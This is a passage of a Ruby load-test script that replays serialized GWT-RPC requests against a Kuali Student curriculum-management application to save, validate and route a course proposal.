7|38|39|3489523331|1309965025280|611000000|8|40|14|59|8|41|38|39|3489523333|1309965025280|613000000|8|42|14|100|-472|-503|-468|-470|-1|-466|8|141|10|-5|8|142|14|143|8|46|14|62|8|144|14|145|8|123|17|5|6|7|0|2|18|-15|14|146|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|147|-535|-537|-529|-533|-1|-527|8|148|14|149|8|48|14|150|8|120|17|5|6|7|0|2|18|-15|14|151|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|152|-555|-557|-549|-553|-1|-547|8|153|17|5|6|7|0|2|18|-15|14|87|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|91|-571|-573|-565|-569|-1|-563|8|154|17|5|6|7|0|0|-1|-579|8|155|17|5|6|7|0|3|8|156|38|39|3489508904|1309965025280|184000000|8|157|89|90|1|0|8|158|14|159|-1|-583|8|21|17|5|6|7|0|3|8|142|17|5|6|7|0|1|8|22|14|160|-597|-599|8|144|17|5|6|7|0|1|8|22|14|145|-597|-605|8|13|17|5|6|7|0|1|8|22|14|161|-597|-611|-1|-595|8|162|17|5|6|7|0|12|8|163|14|164|8|30|14|165|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3489509135|1309965025280|415000000|8|40|14|59|8|41|38|39|3489524194|1309965025280|474000000|8|42|14|166|-619|-625|8|44|14|65|8|167|17|5|6|7|0|1|18|-15|14|128|-619|-643|8|168|14|169|8|170|17|5|6|7|0|0|-619|-651|8|171|17|5|6|7|0|0|-619|-655|8|172|14|173|8|46|14|174|8|48|14|175|8|176|14|177|-1|-617|8|178|17|5|6|7|0|1|8|179|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|180|14|181|8|182|14|183|8|184|14|185|8|186|14|181|8|187|14|181|8|188|14|189|8|190|10|-5|-673|-675|-669|-671|-1|-667|0|0|\"\n else\n contents1 = \"5|0|179|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|2|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|%%_#{opts[:affliated_orgs_id_name]}%%|orgId|%%_#{opts[:admin_dep_var_name]}%%|percentage|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|#{admin_org}|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_name]}%%|1|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|3|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|pilotCourse|revenues|%%_#{opts[:revenues_id_name]}%%|REVENUE|%%_#{opts[:revenue_id_name]}%%|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|7|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491266071|1309965025280|351000000|8|40|14|59|8|41|38|39|3491272352|1309965025280|632000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|85|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-220|-222|-209|-218|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|93|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|94|80|19|100|8|95|14|96|-238|-240|-234|-236|8|97|14|98|8|30|14|99|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491272235|1309965025280|515000000|8|40|14|59|8|41|38|39|3491272236|1309965025280|516000000|8|42|14|100|-234|-253|8|101|14|102|8|21|17|5|6|7|0|2|8|101|17|5|6|7|0|1|8|22|14|103|-273|-275|8|97|17|5|6|7|0|1|8|22|14|104|-273|-281|-234|-271|-230|-232|-1|-228|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|106|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|107|14|108|8|109|17|5|6|7|0|3|8|110|14|111|8|112|14|113|8|21|17|5|6|7|0|1|8|112|17|5|6|7|0|1|8|22|14|114|-315|-317|-307|-313|-301|-305|8|115|80|-246|8|76|17|5|6|7|0|3|8|77|14|116|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|117|-336|-338|-327|-334|-301|-325|8|30|14|118|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491262219|1309965025280|499000000|8|40|14|59|8|41|38|39|3491272295|1309965025280|575000000|8|42|14|119|-301|-346|8|46|14|62|8|120|17|5|6|7|0|0|-301|-364|8|21|17|5|6|7|0|1|8|107|17|5|6|7|0|1|8|22|14|121|-370|-372|-301|-368|-297|-299|-293|-295|8|30|14|122|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491262210|1309965025280|490000000|8|40|14|59|8|41|38|39|3491272289|1309965025280|569000000|8|42|14|119|-293|-380|8|46|14|62|8|123|17|5|6|7|0|0|-293|-398|8|48|14|124|-289|-291|-1|-287|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-412|-414|-406|-410|-1|-404|8|30|14|128|8|129|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|130|14|131|8|21|17|5|6|7|0|1|8|130|17|5|6|7|0|1|8|22|14|132|-434|-436|-428\"\n contents3 = \"|-432|-424|-426|-1|-422|8|133|17|5|6|7|0|0|-1|-442|8|134|14|135|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491257291|1309965025280|571000000|8|40|14|59|8|41|38|39|3491272236|1309965025280|516000000|8|42|14|111|-1|-448|8|136|10|-5|8|137|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|138|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-491|-493|-480|-489|-476|-478|-472|-474|8|97|14|139|8|30|14|140|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491272233|1309965025280|513000000|8|40|14|59|8|41|38|39|3491272236|1309965025280|516000000|8|42|14|100|-472|-503|-468|-470|-1|-466|8|141|10|-5|8|142|14|143|8|46|14|62|8|144|14|145|8|123|17|5|6|7|0|2|18|-15|14|146|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|147|-535|-537|-529|-533|-1|-527|8|148|14|149|8|48|14|150|8|120|17|5|6|7|0|2|18|-15|14|151|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|152|-555|-557|-549|-553|-1|-547|8|153|17|5|6|7|0|2|18|-15|14|87|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|91|-571|-573|-565|-569|-1|-563|8|154|17|5|6|7|0|0|-1|-579|8|155|17|5|6|7|0|3|8|156|38|39|3491257291|1309965025280|571000000|8|157|89|90|1|0|8|158|14|159|-1|-583|8|21|17|5|6|7|0|3|8|142|17|5|6|7|0|1|8|22|14|160|-597|-599|8|144|17|5|6|7|0|1|8|22|14|145|-597|-605|8|13|17|5|6|7|0|1|8|22|14|161|-597|-611|-1|-595|8|162|17|5|6|7|0|12|8|163|14|164|8|30|14|165|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491257553|1309965025280|833000000|8|40|14|59|8|41|38|39|3491273130|1309965025280|410000000|8|42|14|166|-619|-625|8|44|14|65|8|167|17|5|6|7|0|1|18|-15|14|128|-619|-643|8|168|14|169|8|170|17|5|6|7|0|0|-619|-651|8|171|17|5|6|7|0|0|-619|-655|8|172|14|173|8|46|14|174|8|48|14|175|8|176|14|177|-1|-617|8|178|17|5|6|7|0|1|8|179|17|5|6|7|0|0|-669|-671|-1|-667|0|0|\"\n end\n\n # Save & Continue\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}#{contents3}\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:action_request_id_name], \"regexp\" => opts[:action_request_id_regexp]}\n ]\n }\n )\n \n #@request.add(\"DEBUG/affliated_orgs_id_name/%%_#{opts[:action_request_id_name]}%%\", {}, {'subst' => 'true'})\n\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/DocumentRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|F189A2C8AED6D8071F8F9362674CF016|org.kuali.student.core.document.ui.client.service.DocumentRpcService|isAuthorizedUploadDocuments|java.lang.String/2004016611|%%_#{opts[:proposal_dyn_var_name]}%%|referenceType.clu.proposal|1|2|3|4|2|5|5|6|7|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/DocumentRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|F189A2C8AED6D8071F8F9362674CF016|org.kuali.student.core.document.ui.client.service.DocumentRpcService|getRefDocIdsForRef|java.lang.String/2004016611|kuali.org.RefObjectType.ProposalInfo|%%_#{opts[:proposal_dyn_var_name]}%%|1|2|3|4|2|5|5|6|7|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n \n \n #\n # Support Documents\n # Nothing uploaded\n #\n\n @request.add_thinktime(5)\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/DocumentRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|F189A2C8AED6D8071F8F9362674CF016|org.kuali.student.core.document.ui.client.service.DocumentRpcService|getRefDocIdsForRef|java.lang.String/2004016611|kuali.org.RefObjectType.ProposalInfo|%%_#{opts[:proposal_dyn_var_name]}%%|1|2|3|4|2|5|5|6|7|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n\n if(!opts[:collaborator].nil?)\n contents1 = \"5|0|194|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|validate|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|3|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|%%_#{opts[:affliated_orgs_id_name]}%%|orgId|%%_#{opts[:admin_dep_var_name]}%%|percentage|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|#{admin_org}|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_name]}%%|2|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|4|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|6|pilotCourse|revenues|%%_#{opts[:revenues_id_name]}%%|REVENUE|%%_#{opts[:revenue_id_name]}%%|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|8|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators|action|F|actionRequestId|%%_#{opts[:action_request_id_name]}%%|actionRequestStatus|Active|author|canRevokeRequest|firstName|#{opts[:collaborator]}|lastName|permission|KS-SYS~Edit Document|principalId\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491070679|1309965025280|959000000|8|40|14|59|8|41|38|39|3491081941|1309965025280|221000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|85|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-220|-222|-209|-218|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|93|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|94|80|19|100|8|95|14|96|-238|-240|-234|-236|8|97|14|98|8|30|14|99|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491076835|1309965025280|115000000|8|40|14|59|8|41|38|39|3491081856|1309965025280|136000000|8|42|14|100|-234|-253|8|101|14|102|8|21|17|5|6|7|0|2|8|101|17|5|6|7|0|1|8|22|14|103|-273|-275|8|97|17|5|6|7|0|1|8|22|14|104|-273|-281|-234|-271|-230|-232|-1|-228|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|106|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|107|14|108|8|109|17|5|6|7|0|3|8|110|14|111|8|112|14|113|8|21|17|5|6|7|0|1|8|112|17|5|6|7|0|1|8|22|14|114|-315|-317|-307|-313|-301|-305|8|115|80|-246|8|76|17|5|6|7|0|3|8|77|14|116|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|117|-336|-338|-327|-334|-301|-325|8|30|14|118|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491067152|1309965025280|432000000|8|40|14|59|8|41|38|39|3491081913|1309965025280|193000000|8|42|14|119|-301|-346|8|46|14|62|8|120|17|5|6|7|0|0|-301|-364|8|21|17|5|6|7|0|1|8|107|17|5|6|7|0|1|8|22|14|121|-370|-372|-301|-368|-297|-299|-293|-295|8|30|14|122|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491067143|1309965025280|423000000|8|40|14|59|8|41|38|39|3491081907|1309965025280|187000000|8\"\n contents3 = \"|42|14|119|-293|-380|8|46|14|62|8|123|17|5|6|7|0|0|-293|-398|8|48|14|124|-289|-291|-1|-287|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-412|-414|-406|-410|-1|-404|8|30|14|128|8|129|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|130|14|131|8|21|17|5|6|7|0|1|8|130|17|5|6|7|0|1|8|22|14|132|-434|-436|-428|-432|-424|-426|-1|-422|8|133|17|5|6|7|0|0|-1|-442|8|134|14|135|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491062523|1309965025280|803000000|8|40|14|59|8|41|38|39|3491081856|1309965025280|136000000|8|42|14|136|-1|-448|8|137|10|-5|8|138|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|139|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-491|-493|-480|-489|-476|-478|-472|-474|8|97|14|140|8|30|14|141|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491076834|1309965025280|114000000|8|40|14|59|8|41|38|39|3491081856|1309965025280|136000000|8|42|14|100|-472|-503|-468|-470|-1|-466|8|142|10|-5|8|143|14|144|8|46|14|62|8|145|14|146|8|123|17|5|6|7|0|2|18|-15|14|147|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|148|-535|-537|-529|-533|-1|-527|8|149|14|150|8|48|14|151|8|120|17|5|6|7|0|2|18|-15|14|152|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|153|-555|-557|-549|-553|-1|-547|8|154|17|5|6|7|0|2|18|-15|14|87|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|91|-571|-573|-565|-569|-1|-563|8|155|17|5|6|7|0|0|-1|-579|8|156|17|5|6|7|0|3|8|157|38|39|3491062523|1309965025280|803000000|8|158|89|90|1|0|8|159|14|160|-1|-583|8|21|17|5|6|7|0|3|8|143|17|5|6|7|0|1|8|22|14|161|-597|-599|8|145|17|5|6|7|0|1|8|22|14|146|-597|-605|8|13|17|5|6|7|0|1|8|22|14|162|-597|-611|-1|-595|8|163|17|5|6|7|0|12|8|164|14|165|8|30|14|166|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491062758|1309965025280|38000000|8|40|14|59|8|41|38|39|3491082765|1309965025280|45000000|8|42|14|167|-619|-625|8|44|14|65|8|168|17|5|6|7|0|1|18|-15|14|128|-619|-643|8|169|14|170|8|171|17|5|6|7|0|0|-619|-651|8|172|17|5|6|7|0|0|-619|-655|8|173|14|174|8|46|14|175|8|48|14|176|8|177|14|178|-1|-617|8|179|17|5|6|7|0|1|8|180|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|181|14|182|8|183|14|184|8|185|14|186|8|187|10|-5|8|188|10|11|1|8|189|14|190|8|191|14|190|8|192|14|193|8|194|14|190|-673|-675|-669|-671|-1|-667|0|0|\"\n else\n contents1 = \"5|0|180|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|validate|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|3|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|%%_#{opts[:affliated_orgs_id_name]}%%|orgId|%%_#{opts[:admin_dep_var_name]}%%|percentage|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|#{admin_org}|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_name]}%%|2|rateType|fixedRateFee|Fixed Rate Fee|Laboratory 